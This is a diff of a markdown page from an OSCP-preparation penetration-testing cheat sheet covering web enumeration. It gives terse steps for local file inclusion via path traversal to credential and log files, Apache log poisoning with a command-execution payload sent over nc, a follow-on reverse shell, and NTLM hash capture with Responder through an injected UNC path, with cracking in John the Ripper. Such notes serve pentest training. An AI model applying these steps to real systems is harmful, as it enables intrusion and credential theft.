airadulescu/Pen-Test-Guidebook-Cheatsheet-OSCP-Preperation-/Web Ennumeration.md

 4. ../../../../var/www/html/index.php  html to confirm log poisoning
 5. Add  ../ ../../../../ and check if the following following files exists.
 6. /etc/passwd\ /var/log/mail/USER\  /var/log/apache2/access.log\  /proc/self/environ\  /tmp/sess_ID\ /var/lib/php5/sess_ID\ /var/log/auth/log\
-7. /windows/system32/drivers/etc/hosts (for **window host)\
+7. /windows/system32/drivers/etc/hosts (for **window host)\  Go to step 12
 8. Now that we have confirmed LFI vulnerablity, lets log poision ../../../../var/log/apache2/access.log via invalid connection request.
 9. Connect to nc -nv $IP port. and insert commandline exeuction payload (This depends on what techonology it is using. php ..etc)
 10. check for sucessful log poisioning ../../../../var/log/apache2/access.log&cmd=i.
 11. If you receive command execution, we will insert a reversshell via url encoding.
+Done.
+12. Use responder to capture. sudo python3 Responder.py -I tun0. inject file=//$IP/testShare in the url.
+Use john the ripper to match hash.

 ##Login page